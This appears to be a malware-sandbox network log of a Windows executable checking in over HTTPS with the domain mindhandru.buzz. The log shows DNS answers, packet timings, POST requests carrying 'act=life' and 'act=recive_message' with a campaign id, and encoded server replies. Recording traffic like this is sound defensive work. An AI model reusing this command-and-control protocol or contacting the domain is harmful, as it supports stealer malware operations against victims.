                                                                                                              Dec 27, 2024 14:53:30.121577024 CET44349708104.21.11.101192.168.2.9
                                                                                                              Dec 27, 2024 14:53:30.123306990 CET49708443192.168.2.9104.21.11.101
                                                                                                              Dec 27, 2024 14:53:30.123570919 CET49708443192.168.2.9104.21.11.101
                                                                                                              Dec 27, 2024 14:53:30.123606920 CET44349708104.21.11.101192.168.2.9
                                                                                                              Dec 27, 2024 14:53:30.964942932 CET44349708104.21.11.101192.168.2.9
                                                                                                              Dec 27, 2024 14:53:30.965048075 CET44349708104.21.11.101192.168.2.9
                                                                                                              Dec 27, 2024 14:53:30.965214014 CET49708443192.168.2.9104.21.11.101
                                                                                                              Dec 27, 2024 14:53:30.965538979 CET49708443192.168.2.9104.21.11.101
                                                                                                              Dec 27, 2024 14:53:30.965563059 CET44349708104.21.11.101192.168.2.9
                                                                                                              Dec 27, 2024 14:53:31.104435921 CET49709443192.168.2.9104.21.11.101
                                                                                                              Dec 27, 2024 14:53:31.104504108 CET44349709104.21.11.101192.168.2.9
                                                                                                              Dec 27, 2024 14:53:31.104573965 CET49709443192.168.2.9104.21.11.101
                                                                                                              Dec 27, 2024 14:53:31.104990959 CET49709443192.168.2.9104.21.11.101
                                                                                                              Dec 27, 2024 14:53:31.105005980 CET44349709104.21.11.101192.168.2.9
                                                                                                              Dec 27, 2024 14:53:32.414789915 CET44349709104.21.11.101192.168.2.9
                                                                                                              Dec 27, 2024 14:53:32.414988995 CET49709443192.168.2.9104.21.11.101
                                                                                                              Dec 27, 2024 14:53:32.416991949 CET49709443192.168.2.9104.21.11.101
                                                                                                              Dec 27, 2024 14:53:32.417004108 CET44349709104.21.11.101192.168.2.9
                                                                                                              Dec 27, 2024 14:53:32.417258978 CET44349709104.21.11.101192.168.2.9
                                                                                                              Dec 27, 2024 14:53:32.418849945 CET49709443192.168.2.9104.21.11.101
                                                                                                              Dec 27, 2024 14:53:32.419060946 CET49709443192.168.2.9104.21.11.101
                                                                                                              Dec 27, 2024 14:53:32.419096947 CET44349709104.21.11.101192.168.2.9
                                                                                                              Dec 27, 2024 14:53:32.419143915 CET49709443192.168.2.9104.21.11.101
                                                                                                              Dec 27, 2024 14:53:32.459326982 CET44349709104.21.11.101192.168.2.9
                                                                                                              Dec 27, 2024 14:53:33.259712934 CET44349709104.21.11.101192.168.2.9
                                                                                                              Dec 27, 2024 14:53:33.259825945 CET44349709104.21.11.101192.168.2.9
                                                                                                              Dec 27, 2024 14:53:33.259902954 CET49709443192.168.2.9104.21.11.101
                                                                                                              Dec 27, 2024 14:53:33.260232925 CET49709443192.168.2.9104.21.11.101
                                                                                                              Dec 27, 2024 14:53:33.260252953 CET44349709104.21.11.101192.168.2.9
                                                                                                              Dec 27, 2024 14:53:33.437532902 CET49710443192.168.2.9104.21.11.101
                                                                                                              Dec 27, 2024 14:53:33.437587023 CET44349710104.21.11.101192.168.2.9
                                                                                                              Dec 27, 2024 14:53:33.437659979 CET49710443192.168.2.9104.21.11.101
                                                                                                              Dec 27, 2024 14:53:33.438123941 CET49710443192.168.2.9104.21.11.101
                                                                                                              Dec 27, 2024 14:53:33.438138962 CET44349710104.21.11.101192.168.2.9
                                                                                                              Dec 27, 2024 14:53:34.696901083 CET44349710104.21.11.101192.168.2.9
                                                                                                              Dec 27, 2024 14:53:34.696988106 CET49710443192.168.2.9104.21.11.101
                                                                                                              Dec 27, 2024 14:53:34.699841976 CET49710443192.168.2.9104.21.11.101
                                                                                                              Dec 27, 2024 14:53:34.699857950 CET44349710104.21.11.101192.168.2.9
                                                                                                              Dec 27, 2024 14:53:34.700112104 CET44349710104.21.11.101192.168.2.9
                                                                                                              Dec 27, 2024 14:53:34.701400995 CET49710443192.168.2.9104.21.11.101
                                                                                                              Dec 27, 2024 14:53:34.701543093 CET49710443192.168.2.9104.21.11.101
                                                                                                              Dec 27, 2024 14:53:34.701582909 CET44349710104.21.11.101192.168.2.9
                                                                                                              Dec 27, 2024 14:53:34.701653957 CET49710443192.168.2.9104.21.11.101
                                                                                                              Dec 27, 2024 14:53:34.701663971 CET44349710104.21.11.101192.168.2.9
                                                                                                              Dec 27, 2024 14:53:36.111803055 CET44349710104.21.11.101192.168.2.9
                                                                                                              Dec 27, 2024 14:53:36.112124920 CET44349710104.21.11.101192.168.2.9
                                                                                                              Dec 27, 2024 14:53:36.112220049 CET49710443192.168.2.9104.21.11.101
                                                                                                              Dec 27, 2024 14:53:36.112375975 CET49710443192.168.2.9104.21.11.101
                                                                                                              Dec 27, 2024 14:53:36.112405062 CET44349710104.21.11.101192.168.2.9
                                                                                                              Dec 27, 2024 14:53:36.570568085 CET49712443192.168.2.9104.21.11.101
                                                                                                              Dec 27, 2024 14:53:36.570619106 CET44349712104.21.11.101192.168.2.9
                                                                                                              Dec 27, 2024 14:53:36.570693970 CET49712443192.168.2.9104.21.11.101
                                                                                                              Dec 27, 2024 14:53:36.571029902 CET49712443192.168.2.9104.21.11.101
                                                                                                              Dec 27, 2024 14:53:36.571042061 CET44349712104.21.11.101192.168.2.9
                                                                                                              Dec 27, 2024 14:53:37.781738043 CET44349712104.21.11.101192.168.2.9
                                                                                                              Dec 27, 2024 14:53:37.781847954 CET49712443192.168.2.9104.21.11.101
                                                                                                              Dec 27, 2024 14:53:37.783330917 CET49712443192.168.2.9104.21.11.101
                                                                                                              Dec 27, 2024 14:53:37.783344984 CET44349712104.21.11.101192.168.2.9
                                                                                                              Dec 27, 2024 14:53:37.783591032 CET44349712104.21.11.101192.168.2.9
                                                                                                              Dec 27, 2024 14:53:37.784930944 CET49712443192.168.2.9104.21.11.101
                                                                                                              Dec 27, 2024 14:53:37.785054922 CET49712443192.168.2.9104.21.11.101
                                                                                                              Dec 27, 2024 14:53:37.785060883 CET44349712104.21.11.101192.168.2.9
                                                                                                              Dec 27, 2024 14:53:38.534101009 CET44349712104.21.11.101192.168.2.9
                                                                                                              Dec 27, 2024 14:53:38.534208059 CET44349712104.21.11.101192.168.2.9
                                                                                                              Dec 27, 2024 14:53:38.534269094 CET49712443192.168.2.9104.21.11.101
                                                                                                              Dec 27, 2024 14:53:38.534450054 CET49712443192.168.2.9104.21.11.101
                                                                                                              Dec 27, 2024 14:53:38.534472942 CET44349712104.21.11.101192.168.2.9
                                                                                                              Dec 27, 2024 14:53:38.945080996 CET49714443192.168.2.9104.21.11.101
                                                                                                              Dec 27, 2024 14:53:38.945105076 CET44349714104.21.11.101192.168.2.9
                                                                                                              Dec 27, 2024 14:53:38.945192099 CET49714443192.168.2.9104.21.11.101
                                                                                                              Dec 27, 2024 14:53:38.945523024 CET49714443192.168.2.9104.21.11.101
                                                                                                              Dec 27, 2024 14:53:38.945535898 CET44349714104.21.11.101192.168.2.9
                                                                                                              Dec 27, 2024 14:53:40.357620001 CET44349714104.21.11.101192.168.2.9
                                                                                                              Dec 27, 2024 14:53:40.357786894 CET49714443192.168.2.9104.21.11.101
                                                                                                              Dec 27, 2024 14:53:40.359416008 CET49714443192.168.2.9104.21.11.101
                                                                                                              Dec 27, 2024 14:53:40.359442949 CET44349714104.21.11.101192.168.2.9
                                                                                                              Dec 27, 2024 14:53:40.359683037 CET44349714104.21.11.101192.168.2.9
                                                                                                              Dec 27, 2024 14:53:40.367131948 CET49714443192.168.2.9104.21.11.101
                                                                                                              Dec 27, 2024 14:53:40.368505955 CET49714443192.168.2.9104.21.11.101
                                                                                                              Dec 27, 2024 14:53:40.368593931 CET44349714104.21.11.101192.168.2.9
                                                                                                              Dec 27, 2024 14:53:40.368772030 CET49714443192.168.2.9104.21.11.101
                                                                                                              Dec 27, 2024 14:53:40.368818045 CET44349714104.21.11.101192.168.2.9
                                                                                                              Dec 27, 2024 14:53:40.369002104 CET49714443192.168.2.9104.21.11.101
                                                                                                              Dec 27, 2024 14:53:40.369101048 CET44349714104.21.11.101192.168.2.9
                                                                                                              Dec 27, 2024 14:53:40.369282961 CET49714443192.168.2.9104.21.11.101
                                                                                                              Dec 27, 2024 14:53:40.369333029 CET44349714104.21.11.101192.168.2.9
                                                                                                              Dec 27, 2024 14:53:40.369784117 CET49714443192.168.2.9104.21.11.101
                                                                                                              Dec 27, 2024 14:53:40.369812965 CET44349714104.21.11.101192.168.2.9
                                                                                                              Dec 27, 2024 14:53:40.370055914 CET49714443192.168.2.9104.21.11.101
                                                                                                              Dec 27, 2024 14:53:40.370095015 CET44349714104.21.11.101192.168.2.9
                                                                                                              Dec 27, 2024 14:53:40.370105982 CET49714443192.168.2.9104.21.11.101
                                                                                                              Dec 27, 2024 14:53:40.370304108 CET49714443192.168.2.9104.21.11.101
                                                                                                              Dec 27, 2024 14:53:40.370328903 CET49714443192.168.2.9104.21.11.101
                                                                                                              Dec 27, 2024 14:53:40.411345005 CET44349714104.21.11.101192.168.2.9
                                                                                                              Dec 27, 2024 14:53:40.411566973 CET49714443192.168.2.9104.21.11.101
                                                                                                              Dec 27, 2024 14:53:40.411622047 CET49714443192.168.2.9104.21.11.101
                                                                                                              Dec 27, 2024 14:53:40.411643982 CET49714443192.168.2.9104.21.11.101
                                                                                                              Dec 27, 2024 14:53:40.459350109 CET44349714104.21.11.101192.168.2.9
                                                                                                              Dec 27, 2024 14:53:40.459901094 CET49714443192.168.2.9104.21.11.101
                                                                                                              Dec 27, 2024 14:53:40.459969997 CET49714443192.168.2.9104.21.11.101
                                                                                                              Dec 27, 2024 14:53:40.460004091 CET49714443192.168.2.9104.21.11.101
                                                                                                              Dec 27, 2024 14:53:40.507339001 CET44349714104.21.11.101192.168.2.9
                                                                                                              Dec 27, 2024 14:53:40.507453918 CET49714443192.168.2.9104.21.11.101
                                                                                                              Dec 27, 2024 14:53:40.555352926 CET44349714104.21.11.101192.168.2.9
                                                                                                              Dec 27, 2024 14:53:40.730777979 CET44349714104.21.11.101192.168.2.9
                                                                                                              Dec 27, 2024 14:53:42.811220884 CET44349714104.21.11.101192.168.2.9
                                                                                                              Dec 27, 2024 14:53:42.811336994 CET44349714104.21.11.101192.168.2.9
                                                                                                              Dec 27, 2024 14:53:42.811404943 CET49714443192.168.2.9104.21.11.101
                                                                                                              Dec 27, 2024 14:53:42.811578989 CET49714443192.168.2.9104.21.11.101
                                                                                                              Dec 27, 2024 14:53:42.811600924 CET44349714104.21.11.101192.168.2.9
                                                                                                              Dec 27, 2024 14:53:42.822957993 CET49715443192.168.2.9104.21.11.101
                                                                                                              Dec 27, 2024 14:53:42.822999954 CET44349715104.21.11.101192.168.2.9
                                                                                                              Dec 27, 2024 14:53:42.823076010 CET49715443192.168.2.9104.21.11.101
                                                                                                              Dec 27, 2024 14:53:42.823410034 CET49715443192.168.2.9104.21.11.101
                                                                                                              Dec 27, 2024 14:53:42.823426008 CET44349715104.21.11.101192.168.2.9
                                                                                                              Dec 27, 2024 14:53:43.243801117 CET49715443192.168.2.9104.21.11.101
                                                                                                              TimestampSource PortDest PortSource IPDest IP
                                                                                                              Dec 27, 2024 14:53:23.261353016 CET6269253192.168.2.91.1.1.1
                                                                                                              Dec 27, 2024 14:53:23.569819927 CET53626921.1.1.1192.168.2.9
                                                                                                              TimestampSource IPDest IPTrans IDOP CodeNameTypeClassDNS over HTTPS
                                                                                                              Dec 27, 2024 14:53:23.261353016 CET192.168.2.91.1.1.10x5612Standard query (0)mindhandru.buzzA (IP address)IN (0x0001)false
                                                                                                              TimestampSource IPDest IPTrans IDReply CodeNameCNameAddressTypeClassDNS over HTTPS
                                                                                                              Dec 27, 2024 14:53:23.569819927 CET1.1.1.1192.168.2.90x5612No error (0)mindhandru.buzz104.21.11.101A (IP address)IN (0x0001)false
                                                                                                              Dec 27, 2024 14:53:23.569819927 CET1.1.1.1192.168.2.90x5612No error (0)mindhandru.buzz172.67.165.185A (IP address)IN (0x0001)false
                                                                                                              • mindhandru.buzz
                                                                                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                              0192.168.2.949706104.21.11.1014436596C:\Users\user\Desktop\Wvo9FU4qo9.exe
                                                                                                              TimestampBytes transferredDirectionData
                                                                                                              2024-12-27 13:53:25 UTC262OUTPOST /api HTTP/1.1
                                                                                                              Connection: Keep-Alive
                                                                                                              Content-Type: application/x-www-form-urlencoded
                                                                                                              User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36
                                                                                                              Content-Length: 8
                                                                                                              Host: mindhandru.buzz
                                                                                                              2024-12-27 13:53:25 UTC8OUTData Raw: 61 63 74 3d 6c 69 66 65
                                                                                                              Data Ascii: act=life
                                                                                                              2024-12-27 13:53:25 UTC1123INHTTP/1.1 200 OK
                                                                                                              Date: Fri, 27 Dec 2024 13:53:25 GMT
                                                                                                              Content-Type: text/html; charset=UTF-8
                                                                                                              Transfer-Encoding: chunked
                                                                                                              Connection: close
                                                                                                              Set-Cookie: PHPSESSID=mhff8adi44d2e1puuon6ed0929; expires=Tue, 22 Apr 2025 07:40:04 GMT; Max-Age=9999999; path=/
                                                                                                              Expires: Thu, 19 Nov 1981 08:52:00 GMT
                                                                                                              Cache-Control: no-store, no-cache, must-revalidate
                                                                                                              Pragma: no-cache
                                                                                                              X-Frame-Options: DENY
                                                                                                              X-Content-Type-Options: nosniff
                                                                                                              X-XSS-Protection: 1; mode=block
                                                                                                              cf-cache-status: DYNAMIC
                                                                                                              vary: accept-encoding
                                                                                                              Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=0yY02eNG7OIt8uoe7wJdQ4y6Efmm24JTYd%2FDNGdbwwbztkr65A1PEU0btmRqU9HTbeaHRBozRBJJqow5DyG3P83Eg8iUxvO%2Fhfh7VKdA%2Bmf53glWVdAKidakz6dxDB3FxNE%3D"}],"group":"cf-nel","max_age":604800}
                                                                                                              NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                                              Server: cloudflare
                                                                                                              CF-RAY: 8f89cbf48ee16a5e-EWR
                                                                                                              alt-svc: h3=":443"; ma=86400
                                                                                                              server-timing: cfL4;desc="?proto=TCP&rtt=1726&min_rtt=1721&rtt_var=656&sent=5&recv=7&lost=0&retrans=0&sent_bytes=2837&recv_bytes=906&delivery_rate=1656267&cwnd=186&unsent_bytes=0&cid=07f6d500345c281b&ts=773&x=0"
                                                                                                              2024-12-27 13:53:25 UTC7INData Raw: 32 0d 0a 6f 6b 0d 0a
                                                                                                              Data Ascii: 2ok
                                                                                                              2024-12-27 13:53:25 UTC5INData Raw: 30 0d 0a 0d 0a
                                                                                                              Data Ascii: 0


                                                                                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                              1192.168.2.949707104.21.11.1014436596C:\Users\user\Desktop\Wvo9FU4qo9.exe
                                                                                                              TimestampBytes transferredDirectionData
                                                                                                              2024-12-27 13:53:27 UTC263OUTPOST /api HTTP/1.1
                                                                                                              Connection: Keep-Alive
                                                                                                              Content-Type: application/x-www-form-urlencoded
                                                                                                              User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36
                                                                                                              Content-Length: 47
                                                                                                              Host: mindhandru.buzz
                                                                                                              2024-12-27 13:53:27 UTC47OUTData Raw: 61 63 74 3d 72 65 63 69 76 65 5f 6d 65 73 73 61 67 65 26 76 65 72 3d 34 2e 30 26 6c 69 64 3d 50 73 46 4b 44 67 2d 2d 70 61 62 6c 6f 26 6a 3d
                                                                                                              Data Ascii: act=recive_message&ver=4.0&lid=PsFKDg--pablo&j=
                                                                                                              2024-12-27 13:53:27 UTC1133INHTTP/1.1 200 OK
                                                                                                              Date: Fri, 27 Dec 2024 13:53:27 GMT
                                                                                                              Content-Type: text/html; charset=UTF-8
                                                                                                              Transfer-Encoding: chunked
                                                                                                              Connection: close
                                                                                                              Set-Cookie: PHPSESSID=ns677i6lljhgomr9sal3ucotk1; expires=Tue, 22 Apr 2025 07:40:06 GMT; Max-Age=9999999; path=/
                                                                                                              Expires: Thu, 19 Nov 1981 08:52:00 GMT
                                                                                                              Cache-Control: no-store, no-cache, must-revalidate
                                                                                                              Pragma: no-cache
                                                                                                              X-Frame-Options: DENY
                                                                                                              X-Content-Type-Options: nosniff
                                                                                                              X-XSS-Protection: 1; mode=block
                                                                                                              cf-cache-status: DYNAMIC
                                                                                                              vary: accept-encoding
                                                                                                              Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=vFerSzH4%2FNTrOC4dOfu%2FpihYjXtFqUyPaNzCVrhvCB3uIBd6sZwMO3qMyjc6LnTW8%2BL6R%2B%2FAyx1xkcFgly4Ivbmev8EUy139%2B6%2FFiHjkvAEtuJbzurFByWRQlEUHQW%2BNykE%3D"}],"group":"cf-nel","max_age":604800}
                                                                                                              NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                                              Server: cloudflare
                                                                                                              CF-RAY: 8f89cc021c2f42b7-EWR
                                                                                                              alt-svc: h3=":443"; ma=86400
                                                                                                              server-timing: cfL4;desc="?proto=TCP&rtt=2150&min_rtt=1779&rtt_var=932&sent=5&recv=6&lost=0&retrans=0&sent_bytes=2837&recv_bytes=946&delivery_rate=1641371&cwnd=212&unsent_bytes=0&cid=91d6fbc241d8511a&ts=762&x=0"
                                                                                                              2024-12-27 13:53:27 UTC236INData Raw: 31 63 62 35 0d 0a 45 54 34 70 52 4a 5a 57 38 6a 49 4b 63 79 72 7a 58 55 4f 5a 78 61 69 4c 31 70 67 34 38 57 78 48 5a 37 65 70 50 4b 6b 5a 78 73 35 71 48 46 39 6d 72 47 4c 65 45 48 6b 57 43 4d 6b 70 4d 65 79 67 68 4b 6d 33 2f 42 72 4c 43 69 59 4c 78 4d 77 51 69 32 2b 72 37 43 74 59 53 43 6a 6c 4d 39 34 51 62 77 73 49 79 51 59 34 75 36 44 47 71 65 79 36 58 5a 73 4f 4a 67 76 56 79 46 66 47 61 61 71 74 65 56 4a 4f 4c 50 4d 31 6c 6c 4e 6d 48 6b 2b 57 4f 43 4c 7a 71 38 48 6d 76 76 55 61 33 55 34 69 48 5a 57 54 48 75 52 38 73 71 39 63 58 31 6f 76 74 43 76 65 53 53 67 57 52 4e 46 6e 59 66 69 67 79 75 65 77 2f 46 4f 5a 42 43 38 44 31 4d 31 57 32 58 43 67 70 6e 6c 63 54 53 33 35 50 49 4a 65 62 42 6c 45 6b 44
                                                                                                              Data Ascii: 1cb5ET4pRJZW8jIKcyrzXUOZxaiL1pg48WxHZ7epPKkZxs5qHF9mrGLeEHkWCMkpMeyghKm3/BrLCiYLxMwQi2+r7CtYSCjlM94QbwsIyQY4u6DGqey6XZsOJgvVyFfGaaqteVJOLPM1llNmHk+WOCLzq8HmvvUa3U4iHZWTHuR8sq9cX1ovtCveSSgWRNFnYfigyuew/FOZBC8D1M1W2XCgpnlcTS35PIJebBlEkD
                                                                                                              2024-12-27 13:53:27 UTC1369INData Raw: 49 69 75 2b 6d 4b 37 71 79 36 41 74 4e 64 46 77 62 45 32 6b 76 47 61 36 4c 73 62 42 4a 53 5a 76 4d 34 30 41 67 6f 47 55 53 66 4f 69 4c 30 6f 4d 76 70 70 76 56 61 6b 41 59 74 41 64 2f 45 55 63 52 31 72 71 74 37 56 55 77 70 38 7a 79 57 58 32 74 52 42 74 45 34 4f 62 76 2f 69 73 6d 6b 2b 56 6d 48 41 7a 52 46 79 6f 56 48 69 33 79 6f 37 43 73 63 54 53 6a 31 4f 5a 42 43 59 42 70 44 6c 43 30 71 38 71 72 48 36 62 6e 77 56 5a 41 4f 49 67 2f 66 78 46 54 50 64 71 6d 71 63 31 77 4c 61 4c 51 7a 69 42 41 77 55 57 75 55 4c 79 62 33 73 59 6a 54 39 4f 55 55 69 6b 34 69 43 5a 57 54 48 73 4e 2b 70 36 39 34 55 30 67 75 2f 79 61 51 51 6d 34 63 54 59 4d 35 4a 50 57 74 79 66 75 2b 39 46 79 51 42 79 34 4d 30 4d 78 61 69 7a 58 6b 71 32 73 63 45 32 62 56 4f 5a 74 63 59 67 5a 49 30
                                                                                                              Data Ascii: Iiu+mK7qy6AtNdFwbE2kvGa6LsbBJSZvM40AgoGUSfOiL0oMvppvVakAYtAd/EUcR1rqt7VUwp8zyWX2tRBtE4Obv/ismk+VmHAzRFyoVHi3yo7CscTSj1OZBCYBpDlC0q8qrH6bnwVZAOIg/fxFTPdqmqc1wLaLQziBAwUWuULyb3sYjT9OUUik4iCZWTHsN+p694U0gu/yaQQm4cTYM5JPWtyfu+9FyQBy4M0MxaizXkq2scE2bVOZtcYgZI0
                                                                                                              2024-12-27 13:53:27 UTC1369INData Raw: 6e 78 76 75 34 38 46 79 63 41 79 6c 46 6d 34 74 5a 30 7a 76 38 37 46 6c 66 58 79 58 2b 64 71 56 54 5a 68 39 50 68 33 38 2b 74 62 36 4b 37 72 69 36 41 74 4d 44 4a 41 33 54 32 56 48 47 65 4b 71 69 66 46 6c 45 4c 76 51 30 6e 56 56 73 47 6b 4f 53 4d 69 58 70 72 63 72 68 73 66 74 51 6d 55 35 72 52 64 4c 54 48 70 4d 37 6c 62 74 34 48 6e 34 6c 2b 6a 71 58 52 69 67 4f 42 6f 68 2f 4a 76 66 6e 6b 71 6d 35 38 6c 2b 57 41 53 51 50 32 38 35 55 78 33 4f 71 72 32 46 54 54 79 62 34 50 4a 70 64 5a 68 56 41 6d 44 51 71 2f 61 66 4c 34 2f 53 30 47 70 51 57 5a 56 32 56 2f 31 6e 48 64 71 76 75 52 6c 39 46 4b 50 4d 69 30 45 38 6d 43 41 69 57 4d 32 47 6a 35 38 62 67 74 50 46 51 6c 77 34 69 43 4e 44 49 57 63 68 32 6f 36 5a 39 57 30 38 71 2f 54 6d 57 55 47 38 56 54 59 4d 36 4b 50
                                                                                                              Data Ascii: nxvu48FycAylFm4tZ0zv87FlfXyX+dqVTZh9Ph38+tb6K7ri6AtMDJA3T2VHGeKqifFlELvQ0nVVsGkOSMiXprcrhsftQmU5rRdLTHpM7lbt4Hn4l+jqXRigOBoh/Jvfnkqm58l+WASQP285Ux3Oqr2FTTyb4PJpdZhVAmDQq/afL4/S0GpQWZV2V/1nHdqvuRl9FKPMi0E8mCAiWM2Gj58bgtPFQlw4iCNDIWch2o6Z9W08q/TmWUG8VTYM6KP
                                                                                                              2024-12-27 13:53:27 UTC1369INData Raw: 75 75 77 61 6a 45 41 38 52 64 4c 48 48 70 4d 37 72 61 56 68 55 6b 55 76 2b 54 4b 59 56 32 59 63 51 35 63 30 4a 76 79 68 78 2b 47 35 2f 31 6d 53 43 69 38 58 31 73 42 55 78 6e 48 6b 34 6a 4e 62 55 32 61 73 64 4c 64 63 51 51 46 54 67 79 6c 68 35 4f 6e 54 71 62 50 32 47 73 74 4f 4a 67 72 63 78 46 62 44 64 4b 75 6f 66 56 70 4e 4b 2f 45 37 6d 6b 4a 67 48 30 57 61 4d 43 72 70 70 38 66 74 75 50 35 53 6d 41 52 6c 53 35 58 4d 52 6f 73 6a 35 4a 6c 2b 55 30 73 6c 34 6e 53 50 48 6e 46 52 54 35 31 2f 65 62 75 72 78 4f 6d 37 39 6c 61 59 42 69 51 4a 32 38 78 62 77 6e 4f 73 76 6e 4a 59 51 79 66 36 4f 35 46 55 62 52 52 4d 6c 6a 73 6e 39 4f 65 45 71 62 50 69 47 73 74 4f 43 69 4c 67 69 58 2f 78 4f 37 76 69 61 68 78 4d 4b 72 52 73 30 46 78 72 48 55 43 65 4f 53 6a 33 72 63 50
                                                                                                              Data Ascii: uuwajEA8RdLHHpM7raVhUkUv+TKYV2YcQ5c0Jvyhx+G5/1mSCi8X1sBUxnHk4jNbU2asdLdcQQFTgylh5OnTqbP2GstOJgrcxFbDdKuofVpNK/E7mkJgH0WaMCrpp8ftuP5SmARlS5XMRosj5Jl+U0sl4nSPHnFRT51/eburxOm79laYBiQJ28xbwnOsvnJYQyf6O5FUbRRMljsn9OeEqbPiGstOCiLgiX/xO7viahxMKrRs0FxrHUCeOSj3rcP
                                                                                                              2024-12-27 13:53:27 UTC1369INData Raw: 5a 63 4e 49 51 44 61 79 6c 2f 4e 61 61 4f 6c 59 56 4a 47 4b 66 77 38 6d 56 46 73 46 45 57 58 4d 79 76 36 6f 4d 54 6e 76 4c 6f 55 30 77 6b 39 52 59 32 4c 66 39 74 67 74 72 70 2b 66 55 59 70 74 43 76 65 53 53 67 57 52 4e 46 6e 59 66 4b 31 7a 75 53 6d 38 31 32 64 41 53 59 58 31 4d 5a 56 32 58 79 72 71 48 52 51 54 53 6e 79 4e 5a 56 61 5a 42 5a 4e 6d 6a 41 74 75 2b 6d 4b 37 71 79 36 41 74 4d 67 4c 68 62 43 79 46 44 41 62 62 2f 73 62 42 4a 53 5a 76 4d 34 30 41 67 6f 45 6b 4f 61 4f 79 48 33 70 38 37 6b 74 4f 68 56 6c 41 6b 73 44 73 66 42 57 63 78 77 72 4b 64 38 57 6c 6b 71 2b 69 61 56 51 6e 70 52 42 74 45 34 4f 62 76 2f 69 74 2b 7a 36 6b 71 51 54 42 51 54 31 74 31 56 78 6e 66 6b 73 7a 31 46 43 79 48 34 64 4d 67 51 62 68 35 42 6b 6a 41 67 38 71 76 48 37 4c 33 2f
                                                                                                              Data Ascii: ZcNIQDayl/NaaOlYVJGKfw8mVFsFEWXMyv6oMTnvLoU0wk9RY2Lf9tgtrp+fUYptCveSSgWRNFnYfK1zuSm812dASYX1MZV2XyrqHRQTSnyNZVaZBZNmjAtu+mK7qy6AtMgLhbCyFDAbb/sbBJSZvM40AgoEkOaOyH3p87ktOhVlAksDsfBWcxwrKd8Wlkq+iaVQnpRBtE4Obv/it+z6kqQTBQT1t1Vxnfksz1FCyH4dMgQbh5BkjAg8qvH7L3/
                                                                                                              2024-12-27 13:53:27 UTC1369INData Raw: 34 4c 35 38 68 46 69 32 54 71 74 54 4e 62 52 32 61 73 64 4a 4e 58 61 78 42 43 6d 44 4d 75 2f 4b 50 59 34 37 50 6f 57 35 49 46 4b 41 6e 56 78 6c 50 42 65 71 32 68 66 31 46 4d 49 66 73 78 30 42 34 6f 46 6c 44 52 5a 32 48 61 71 73 48 6c 37 36 41 61 6a 45 41 38 52 64 4c 48 48 70 4d 37 70 4b 5a 32 56 6b 59 6c 2b 7a 65 43 55 57 34 44 53 4a 77 31 4d 2f 47 73 7a 2b 53 35 39 31 6d 56 43 43 34 4a 78 38 4a 65 79 48 44 6b 34 6a 4e 62 55 32 61 73 64 4c 4e 48 66 68 74 50 6e 53 6b 71 2b 71 54 63 35 4b 53 36 46 4e 4d 66 49 68 53 56 6b 30 6a 62 62 4b 4f 7a 50 55 55 4c 49 66 68 30 79 42 42 75 47 45 36 57 4f 53 2f 70 6f 73 7a 6d 75 2f 4e 54 6c 77 59 6d 42 64 48 50 57 63 35 34 71 4b 64 30 58 30 51 69 2f 54 71 5a 58 79 68 66 43 4a 59 6e 59 61 50 6e 36 2f 4b 33 39 6c 66 54 45
                                                                                                              Data Ascii: 4L58hFi2TqtTNbR2asdJNXaxBCmDMu/KPY47PoW5IFKAnVxlPBeq2hf1FMIfsx0B4oFlDRZ2HaqsHl76AajEA8RdLHHpM7pKZ2VkYl+zeCUW4DSJw1M/Gsz+S591mVCC4Jx8JeyHDk4jNbU2asdLNHfhtPnSkq+qTc5KS6FNMfIhSVk0jbbKOzPUULIfh0yBBuGE6WOS/poszmu/NTlwYmBdHPWc54qKd0X0Qi/TqZXyhfCJYnYaPn6/K39lfTE
                                                                                                              2024-12-27 13:53:27 UTC276INData Raw: 4c 45 49 74 38 76 4f 77 72 48 47 73 74 34 6a 47 58 52 69 6f 6b 53 35 38 78 4a 75 33 6e 31 64 62 36 75 6c 57 4a 54 6e 30 38 7a 49 74 5a 78 7a 76 38 37 47 5a 62 53 79 48 75 49 70 64 63 65 52 70 46 6e 52 30 75 2f 4c 48 4a 35 72 66 72 55 39 38 46 4b 45 57 62 69 31 6e 54 4f 2f 7a 73 58 46 74 64 4a 64 73 33 67 56 6b 6f 58 77 69 57 4b 57 47 6a 35 2f 53 70 70 76 6c 4b 6b 41 45 30 4f 35 57 54 52 2f 55 37 72 37 70 30 54 45 67 77 2f 7a 6d 63 51 56 5a 52 45 4d 56 74 63 36 6e 31 6d 50 62 30 35 57 58 64 54 69 52 46 6a 66 4a 48 69 32 33 6b 39 43 45 53 43 7a 53 30 62 4e 41 58 61 77 4e 61 6c 7a 77 33 2b 4f 44 30 31 35 50 73 55 4a 51 65 49 68 4c 61 69 78 43 4c 64 4f 54 30 53 68 78 43 49 65 38 6c 68 6c 31 34 46 67 69 75 63 57 48 6a 35 35 4b 70 67 66 6c 55 6e 51 6b 7a 46 4a
                                                                                                              Data Ascii: LEIt8vOwrHGst4jGXRiokS58xJu3n1db6ulWJTn08zItZxzv87GZbSyHuIpdceRpFnR0u/LHJ5rfrU98FKEWbi1nTO/zsXFtdJds3gVkoXwiWKWGj5/SppvlKkAE0O5WTR/U7r7p0TEgw/zmcQVZREMVtc6n1mPb05WXdTiRFjfJHi23k9CESCzS0bNAXawNalzw3+OD015PsUJQeIhLaixCLdOT0ShxCIe8lhl14FgiucWHj55KpgflUnQkzFJ
